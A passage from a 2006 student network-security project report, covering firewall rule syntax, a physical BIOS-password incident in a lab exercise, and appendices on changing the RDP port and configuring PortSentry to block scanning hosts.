The firewall rules can be roughly divided into three categories:
107
1. Rules that are configured in the Firewall Rules format, and saved in this format
This format is used by the "Advanced Filtering" feature in order to insert generic
firewall rules.
2. Rules that belong to the firewall features. These rules are controlled by the
various tabs in the security screen, and have their own format
3. Implicit rules that are part and of network devices configuration. For example, the
security level (Minimum/Typical/High) or the Internet Connection Firewall
check box in a Connection Setting screen.
Firewall Rule
Firewall Rule is a generic API for controlling the firewall operation, providing you with
full control of matching and filtering. This is also the firewall external interface for tasks
that wish to configure firewall rules. Each firewall rule consists of a match section and an
action section. When a packet arrives at the firewall it will be scanned according to the
match section. If it passes the criteria in the match section, the rule action will be taken.
For example, take this advance filtering rule:
(rule
(0
(enabled(1))
(match
(ip_src_start(212.1.1.8))
(ip_src_end(121.1.1.233))
(ip_dst_start(0.0.0.0))
(ip_dst_end(255.255.255.255))
)
(action
108
(type(accept))
(log(1))
)
)
The match section will match packets that have a source IP in the range of 212.1.1.8-
212.1.1.233. If the packet is matched, the action to take is to accept the packet and to
generate a log message.
The important firewall actions are:
• Drop - drops the packet.
• Reject - drops the packet and sends an ICMP error or a TCP reset to the
origination peer.
• Accept - accepts the packet (stateful).
• Accept Packet - accepts the packet (stateless).
• Accept-NAT - for outbound packets: accepts the packet and NATs the source IP
address.
• Accept-Redirect - for inbound Packets: accepts the packet and NATs the
destination address (this action also known as DNAT or RNAT).
• Log - generates a log message.
• Call - calls a chain (see below).
Firewall Chain
A chain in the firewall is a list of rules, which are performed sequentially one after the
other. The chain lets you create a more complex and optimized firewall rule set. For
109
example, the core chain of the firewall is the input chain, which is called for inbound
packets only, and the outbound chain, which is called for outbound packets only. The
flow of a packet in the firewall chain is controlled by rules that have the Call as their
action section. A good example for the use of chains is the firewall GUI, which gives you
an interface to fill up several chains:
• Initial inbound: First rules performed by the firewall for inbound packets.
• Initial outbound: First rules performed by the firewall for outbound packets.
• Inbound/outbound chains for each device - chains that consist of rules to perform
when a packet is received/transmitted on a certain device.
• Final inbound: Last rules performed by the firewall for inbound packets.
• Final outbound: Last rules performed by the firewall for outbound packets.
Looking at firewall rules as an execution program to the data-path module, the Chain
represents calling to a function if some condition is matched. For instance, if the packet is
incoming on device 'dev0' call 'Inbound device chain'. Chains can also return a value
when their performance is over.
Rules and Chains Examples
Advance filter rg_conf API is a strong tool used to configure firewall rules in the most
flexible way. Residing in rg_conf/fw/policy it enables you to:
• Define several policies for the firewall.
• Group rules in a chain.
• Define initial and final rules.
110
• Define rules per device.
• Define rules that match Service, IP address, IP range, MAC address, and other
options such as fragments.
• Define action for rule: call for other chain, accept and create statefull inspection
connection, accept stateless, drop packet, reject.
• Define rules using a wildcard interface or a wildcard IP. For example: All LAN
devices/All WAN devices.
The advanced filter mechanism can be used as a platform for firewall chain call
precedence.
The rg_conf contains two main chains, used only to define the call order for chains:
• Inbound traffic (chain ID 1300)
• Outbound traffic (chain ID 1400)
Each one of the main chains is used only to define the call precedence for specific chains,
where specific rules are grouped.
The following is an example for rg_conf call chain:
(1300 // Chain 1300 - Inbound chain
(description(Inbound rules)) // Chain description
(type(5))
(output(0))
(rule
111
(0 // Rule 0 - Call Initial inbound chain
(enabled(1))
(action
(type(call))
(chain(900))
)
)
(1 // Rule 1 - Call device eth1 inbound rules
(enabled(1))
(action
(type(call))
(chain(1656))
)
(match
(if(eth1))
)
)
)
)
112
Chain calling order is predefined by system experts. Changing them may destabilize the
system security. It is not advised to modify the chain structure.
Advanced Filtering Rule - 1
The following is an example of an advanced filter rule (without service) that blocks all
communication from LAN host 192.168.1.15 to any WAN host.
(rule // Rule entry
(0 // Rule ID #0
(enabled(1)) // Rule is active
(match // Rule conditions
(ip_src_start(192.168.1.15)) // Rule source IP address
(ip_src_end(192.168.1.15)) // 192.168.1.15
(ip_dst_start(0.0.0.0)) // Rule destination IP address
(ip_dst_end(255.255.255.255)) // Any address:0.0.0.0-
255.255.255.255
(services) // No services for this rule
)
(action // Rule result
(type(drop)) // Drop packet
(log(0)) // Do not log
)
)
)
Advanced Filtering Rule - 2
The following is an advanced filter rule service example. This rule allows all HTTP
communication from any IP address to one of Yahoo!TM 's IPs:
(rule // Rule entry
113
(0 // Rule ID #0
(enabled(1)) // Rule is active
(match // Rule conditions
(ip_frag(0)) // Allow fragmented packets
(ip_src_start(0.0.0.0)) // Rule source IP address: any
address
(ip_src_end(255.255.255.255)) // 0.0.0.0 - 255.255.255.255
(ip_dst_start(66.218.71.198)) // Rule destination IP address:
(ip_dst_end(66.218.71.198)) // 66.218.71.198 (yahoo.com)
(services // Rule services: if packet match
the
(0 // following services:
(service_id(16777219)) // Use service 16777219 (HTTP): If
) // packet is TCP and destined
to port 80
)
)
(action // Rule result
(type(accept)) // Accept packet and open
connection
(log(1)) // Log this connection opening
)
)
)
Advanced MAC Filtering
The following is an example of an advanced filtering MAC rule example. Using an
advanced filter enables you to define sophisticated MAC filter rules, which match not
only MAC addresses, but protocols and ports as well. For example, you want to prevent
114
HTTP access from one of your LAN hosts, but to allow it other communications. Further
more, you would like to log each time it tries to connect to the HTTP server. The
following rule should be added in either the initial inbound chain, or the specific device
chain.
(rule
(0
(enabled(1))
(match
(mac_src(aa:bb:cc:dd:ee:ff)) // LAN host MAC address
(services
(0
(service_id(16777219)) // HTTP service ID
)
)
)
(action // Rule result
(type(drop)) // Accept packet and open
connection
(log(1)) // Log this connection opening
)
)
)
Another MAC filtering rule would be to deny all but a set of predefined MAC addresses
from accessing all ports and protocols. In this way you will be preventing all foreign
MACs from exploiting your network internet connection or using sniffing or password
cracking software. But even if a foreign PC is connected while all its services are denied
115
it is still considered a security breach. The best security measure would be to physically
secure the routers and switches of your LAN [whole section from 25].
5.2 Second Attack: Physical Attack
On Monday the 22nd of May, one day before the FYP report submission, and after an
absence of 2 days (weekend) from the Labs, we discovered upon switching on the
computers that the BIOS password had been changed. A display message asked us for the
“current password” before we could even enter the setup or load windows (the display
message appeared just as the computer was switched on).
Although we had researched and knew about such a threat (accessing BIOS settings,
including password, and modifying them), a misunderstanding in the course of the
semester lead our team to omit putting a password that could not be cracked. Hence, the
hackers were successful in spotting a dangerous security breach, and denied us of using
our computers (and hence our services).
The only way to fix this problem was to “physically” reset the BIOS password. This can
be done by opening the CPU case, and unplugging a 3 legged jumper (jumper 13) on the
mother board and re-plugging upon switching the computer ON. For more information on
how to prevent physical attacks, refer to section 2.1 (e.g. of counter-measures: lock the
case, set-up cameras…).
After we physically reset the passwords ourselves, everything went back to normal (with
no memory loss incurred) and we could log again to the Windows workstations and
servers. After checking the log files, and comparing the “vital company files” we created
with the backups, we were assured that no further internal attack was made.
116
Note that our team stopped monitoring the network on Monday, May 22, 2006 at
6:00pm, i.e. 18 hours before the report submission deadline in order to focus on
writing the report. Nonetheless, some colleagues of ours, working on their own
FYP’s in the computer labs, informed us that the hackers’ team showed up at
around 7:30pm on Monday, May 22, 2006, along with a person external to FEA, to
conduct some hacks on the network. Not only did they use outside help, but violated
a ‘cease-fire’ accord we had put into place to concentrate on writing the report.
117
Conclusion Network security is essential to any business or even home that has a network connected
to the outside world (by means of the Internet for example). Our FYP was conducted in
this sense. This report aims at being a proper documentation usable in any situation
where a network has to be built and secured.
In the first part of the report, we have briefly presented an overview of networks to fully
understand the way in which they operate. Then, we have explored the theory of network
security. We have seen that it can be dissected according to the network layers, and the
corresponding security of each was discussed in depth. However, this does not cover all
aspects of network security. An attack through a given layer (for instance IP session
hijacking on the network layer) can lead to a breach on another layer (for example
sending malicious code on application layer). Therefore, it is important to keep in mind
that network security should be seen as a whole, even though it is divided into different
layers. Then, we have presented a survey of the most common threats and the ways they
should be dealt with, as to properly secure a network, it is important to know the enemy.
Topics such as attacks automated by malicious codes, denial of service (DoS) and Social
Engineering were covered.
After this ‘theory’ part of the report, we have documented all the process that lead to the
installation and defense of the network. Our network topology was presented (hierarchal
star topology to simulate a real business environment), as well as the means in which we
secured the perimeter (using a Lynksys Firewall). Then, we described the way in which
we installed the network (from installing the Operating Systems to creating a domain),
and went on to document the steps we took to secure it. We started by downloading all
118
relevant patches and service packs, then went on to disable the USB ports to protect the
network against flash drives, and ran some free ware tools such as LanGuard and Event
Alarm to tighten and monitor the security.
Once our secured network was up-and-running, we started to work on ways to optimize
security and monitoring. First, we customized a Honey D program to our network’s
topology and needs (using Fedora) to confuse the hackers (when conducting external
attacks). Then, we wrote a windows program that monitored the user logs: the output of
the program was a log file with the username of each user that has logged in, as well as
the time of logging in and out. In this way, internal attacks were spotted more easily and
dealt with in a faster and hence more efficient way.
Finally, the report also gives a full documentation of the attacks that were performed by
the hackers’ team. Although this was meant to be an exciting part of our FYP, the
hackers’ team was late in starting those attacks and hence not a lot of security breaches
were reported.
The FYP was a chance for us to be exposed to windows and UNIX network security, and
gave us much needed exposure to these Operating Systems. Not only did we learn about
the theory behind network security, we also applied it and ‘lived’ it throughout the
second half of the year. We also contributed to the field by introducing Honey D’s as
important and useful tools (they are not commonly used in businesses), as well as
creating a program that can enable a network administrator to monitor and archive the
logs. Many other contributions can be introduced in future work, as the network security
field is a really wide one!
119
Reference
1. Majari, S.A. “Security Engineering: Survey Analysis and Practical Guidelines for
a multi-dimensional layered security”, 2004.
2. Cisco Systems “Interconnecting Cisco Network Devices – Student Guide”
3. Ford, D. “8 Simple Rules For Securing Your Internal Network”, 2003
4. Lai, Hock, Tai “Windows 2000 vulnerabilities and Solutions”, 2003
5. http://www.atstake.com/research/advisories/2001/Outlook-NT4SP6a-
BufferOverflow.vcf
6. www.securityfocus.com/data/vulnerabilities/exploits/wins2.pl
7. http://www.atruereview.com/articles/winsecurity.php
8. http://en.wikipedia.org/wiki/Network_topology
9. “Cisco Integrated Firewall Solutions” (data sheet):
http://www.cisco.com/application/pdf/en/us/guest/netsol/ns118/c654/cdccont_090
0aecd800eed2e.pdf
10. “Perimeter Security: A Security Blueprint for Enterprise Network”, Cisco White
Paper, no date available
11. “The Evolution of Network Security: From DMZ Designs to Devices”,
Metagroup White Paper, May 2004)
12. Curtin, M. “Introduction to Network Security”, March 1997
13. Blaze M., Ionnadis J., Keromytis A.D. “Trust Management and Network Layer
Security”, AT&T Laboratories – Research
14. http://library.thinkquest.org/04oct/00460/netwAttack.html
120
15. http://www.comptechdoc.org/independent/security/recommendations/secattacks.h
tml
16. http://www.insecure.org/sploits/l0phtcrack.lanman.problems.html
17. http://www.securitydocs.com/library/2695
18. http://labmice.techtarget.com/articles/usbflashdrives.htm
19. http://www.jsifaq.com trick number 7093
20. A Virtual Honeypot Framework: http://niels.xtdnet.nl/papers/honeyd.pdf
21. Specter: http://www.specter.com
22. Honeyd: http://www.citi.umich.edu/u/provos/honeyd/
23. Decoy Server: http://www.recourse.com
24. Honeynets: http://project.honeynet.org/papers/honeynet/
25. www.jungo.com
121
Appendix
Appendix A
Source: http://support.microsoft.com/default.aspx?scid=187623
1. Run Regedt32 and go to this key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
NOTE: The above registry key is one path; it has been wrapped for readability.
2. Find the "PortNumber" subkey and notice the value of 00000D3D, hex for (3389). Modify the port number in Hex and save the new value. To change the port for a specific connection on the Terminal Server:
• Run Regedt32 and go to this key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\connection
NOTE: The above registry key is one path; it has been wrapped for readability.
3. Find the "PortNumber" subkey and notice the value of 00000D3D, hex for (3389). Modify the port number in Hex and save the new value. NOTE: Because the use of alternate ports has not been fully implemented for Terminal Server 4.0, support will be provided as "reasonable effort" only, and Microsoft may require you to set the port back to 3389, if any problems occur.
Appendix B: PortSentry
1. Download and unzip source code: o Download: PortSentry source code (from
http://sourceforge.net/projects/sentrytools) (Note: Portsentry version 1.1 includes a bug fix required for Red Hat 7.1 kernel 2.4)
o Move to your source directory and unzip: tar -xzf portsentry-1.1.tar.gz
122
2. Edit include file and compile: cd portsentry-1.1/ Read file README.install. It details the following:
o
Edit file: portsentry_config.h
Set options:
CONFIG_FILE - PortSentry run-time configuration file. WRAPPER_HOSTS_DENY - The path and name of TCP wrapper
hosts.deny file.
#define CONFIG_FILE "/opt/portsentry/portsentry.conf" #define WRAPPER_HOSTS_DENY "/etc/hosts.deny" #define SYSLOG_FACILITY LOG_DAEMON #define SYSLOG_LEVEL LOG_NOTICE
(Note: we use /opt/portsentry/ because we can locate custom files/software there. It allows for an easy backup by separating it from the OS. If you prefer, you can use /etc/portsentry/ for configurations files and follow the Linux/Unix file system logic)
The above default, "LOG_DAEMON", will log messages to the /var/log/messages file.
To log to a separate file dedicated to PortSentry logging: (This will eliminate logging clutter in the main system logging file)
Add logging directives to syslogd configuration file: /etc/syslog.conf
Change the following line to reflect that portsentry messages are not going to be logged to the regular syslog output file /var/log/messages
*.info;mail.none;news.none;authpriv.none;local6.none /var/log/messages
Add the following line to assign a portsentry log facility:
local6.* /var/log/portsentry.log
Note: Use tab not spaces in the syslog configuration file.
123
Restart syslogd: /etc/rc.d/init.d/syslog restart
Set portsentry_config.h entry to new log facility: #define SYSLOG_FACILITY LOG_LOCAL6
Options for the SYSLOG_FACILITY are defined in /usr/include/sys/syslog.h They include:
SYSLOG_FACILITY Facility Name Description LOG_LOCAL0 local0 reserved for local use LOG_LOCAL1 local1 reserved for local use LOG_LOCAL2 local2 reserved for local use LOG_LOCAL3 local3 reserved for local use LOG_LOCAL4 local4 reserved for local use LOG_LOCAL5 local5 reserved for local use LOG_LOCAL6 local6 reserved for local use LOG_LOCAL7 local7 reserved for local use LOG_USER user random user-level messages LOG_MAIL mail mail system LOG_DAEMON daemon system daemons LOG_SYSLOG syslog messages generated internally by syslogd LOG_LPR lpr line printer subsystem LOG_NEWS news network news subsystem LOG_UUCP uucp UUCP subsystem LOG_CRON cron clock daemon LOG_AUTHPRIV authpriv security/authorization messages (private) LOG_FTP ftp ftp daemon
Options for the SYSLOG_LEVEL include:
SYSLOG_LEVEL Priority Description LOG_EMERG 0 system is unusable LOG_ALERT 1 action must be taken immediately LOG_CRIT 2 critical conditions LOG_ERR 3 error conditions LOG_WARNING 4 warning conditions
124
LOG_NOTICE 5 normal but significant condition LOG_INFO 6 informational LOG_DEBUG 7 debug-level messages
o
Edit file: portsentry.conf to set paths for configuration files and ports to monitor.
IGNORE_FILE="/opt/portsentry/portsentry.ignore" HISTORY_FILE="/opt/portsentry/portsentry.history" BLOCKED_FILE="/opt/portsentry/portsentry.blocked" KILL_ROUTE="/sbin/route add -host $TARGET$ reject" - Generic Unix KILL_ROUTE iptables/ipchains options below are better
Uncomment and modify if necessary the appropriate statements. The TCP_PORTS=, UDP_PORTS= lists are ignored for stealth scan detection modes. We added UDP port 68 (BOOTP) and TCP 21 (ftp), 22 (ssh), 25 (smtp mail), 53 (dns bind), 80 (http web server), 119 (news) to the ADVANCED_EXCLUDE_UDP and ADVANCED_EXCLUDE_TCP statements respectively.
ADVANCED_EXCLUDE_TCP="21,22,25,53,80,110,113,119" - server ADVANCED_EXCLUDE_UDP="21,22,53,110,520,138,137,68,67" OR ADVANCED_EXCLUDE_TCP="113,139" - workstation ADVANCED_EXCLUDE_UDP="520,138,137,68,67"
List of ports used by Remote Access trojans
PAM options:
125
KILL_HOSTS_DENY="ALL: $TARGET$"
For more on PAM see YoLinux network Admin Tutorial
Route deny options: (Options: network "route" or firewall command "iptables/ipchains")
Simple method to drop network return routes if ipchains are not compiled into your kernel: KILL_ROUTE="/sbin/route add -host $TARGET$ reject" You can check the addresses dropped with the command: netstat -rn They will be routed to interface "-".
For Linux 2.2.x kernels (version 2.102+) using ipchains: (Best option) KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l" OR KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY" Note: The second option is without the "-l" or logging option so ipchains won't keep logging the portscan in /var/log/messages
For those using iptables (RH 7.1+ Linux Kernel 2.4+): KILL_ROUTE="/sbin/iptables -I INPUT -s $TARGET$ -j DROP" (Note: The default used in portsentry.conf uses the incorrect path for Red Hat. Change /usr/local/bin/iptables to /sbin/iptables)
Note on Red Hat 7.1: During installation/upgrade the firewall configuration tool /usr/bin/gnome-lokkit may be invoked. It will configure a firewall using ipchains and will add this to your boot process. To see if ipchains and the Lokkit configuration is invoked during system boot, use the command: chkconfig --list | grep ipchains. You can NOT use portsentry to issue iptables rules if ipchain rules have been issued previously. More info on iptables and ipchains support/configuration in Red Hat 7.1 and kernel 2.4.
Edit file: portsentry.ignore (contains IP addresses to ignore. )
127.0.0.1 0.0.0.0 Your IP address
The at Home network routinely scans for news servers on port 119 from a server named authorized-scan1.security.home.net. Adding the IP address
126
of this server (24.0.0.203) greatly reduces the logging. I also added their BOOTP server. (24.9.139.130)
We manually issued the iptables (RH 7.1 kernel 2.4) commands on my workstation to drop the hosts and deny their scans. At Home users may add the commands to the file /etc/rc.d/rc.local
/sbin/iptables -I INPUT -s 24.0.0.203 -j DROP /sbin/iptables -I INPUT -s 24.9.139.130 -j DROP
Edit file: Makefile
INSTALLDIR = /opt
And remove the line under "uninstall": (dangerous line!!)
# /bin/rmdir $(INSTALLDIR)
And remove the line under "install": (troublesome line!!)
# chmod 700 $(INSTALLDIR)
Compile: make linux
Install (as root): make install
Run PortSentry for advanced UDP/TCP stealth scan detection: portsentry -atcp portsentry -audp
OR use init scripts below in next section.
127
Check logfile for hacker attacks. See: /var/log/messages or /var/log/portsentry.log if you are logging to a dedicated file. Also check /etc/hosts.deny to see a list of IP addresses that PortSentry has deamed attackers. Check the "HISTORY_FILE" /opt/portsentry/portsentry.history
Note: Is is possible to have all logging sent to a logging daemon on a single server. This will allow the administrator to check the logs on only one server rather than individually on many.
Note on Red Hat 7.1: Red Hat Powertools 7.1 now includes portsentry 1.0. I reccomend using version 1.1 configured as above. Powertools RPM layout:
• /usr/sbin/portsentry - (chmod 700) executable • /etc/portsentry/ - (chmod 700) Directory used for configuration files. • /etc/portsentry/portsentry.conf (chmod 600) • /etc/portsentry/portsentry.ignore (chmod 600) • /var/portsentry/portsentry.history • /var/portsentry/portsentry.blocked
Instead of using a firewall command (ipchains/iptables), a false route is used: /sbin/route add -host $TARGET$ gw 127.0.0.1. My init script calls the portsentry executable twice with the apropriate command line arguments to monitor tcp and udp ports. The Red Hat 7.1 init script uses the file /etc/portsentry/portsentry.modes and a for loop in the init script to call portsentry the appropriate number of times. Their init script also recreates the portsentry.ignore file each time portsentry is started by including the IP addresses found with ifconfig and the addresses 0.0.0.0 and localhost. Persistent addresses must be placed above a line stating: Do NOT edit below this otherwise it is not included in the creation of the new file.
128
Appendix C: Timeline and Budget
After conducting an extensive literature survey in the fall semester, and learning about
network security theory, we began installing the network as the spring semester was
starting and worked on the ‘practical’ part of the FYP according to the following
timeline:
• Feb 15th to March 1st: installing the additional RAMs on the computer, installing
the Operating Systems and ordering the Firewall/switch.
• March 1st to March 31st: Setting up the network (domain, user accounts…) and
increasing network security (patches, services packs, server settings…).
• March 15th to March 31st: Researching Honey Pots.
• March 15th to March 31st: Researching on ways to monitor the Logs (log files).
• April 1st and onwards: The external attacks were supposed to start, but the
hacker team did not show up until end of April – beginning of May.
• April 1st to April 30th: Writing the Code for the Log Monitor, testing it and
installing it on our network (this program was not as necessary during external
attacks as it was during internal attacks). Note that since we had a few problems
when installing the code on Windows 2000 (it was written on XP – refer to
section 4.6), the program was operational a little late of schedule (around May
5th). Nonetheless, this did not affect our security since the hackers’ team had
not even started the internal attacks by that time.
• April 1st onwards: choosing the appropriate Honey Pot (Honey D), installing it
and configuring it according to our network’s needs.
129
• The attacks effectively took place during the last 2 or 3 weeks before FYP report
submission date (i.e. May 22). Note that our team stopped monitoring the
network on Monday, May 22, 2006 at 6:00pm, i.e. 18 hours before the report
submission deadline in order to focus on writing the report.
Budget:
• Firewall/Switch: $89.00 (paid by AUB)
• Additional RAMs: $120.00 (paid by AUB)
• Printing Reports (Spring + Fall): $100.00
• TOTAL COST: $309.00
130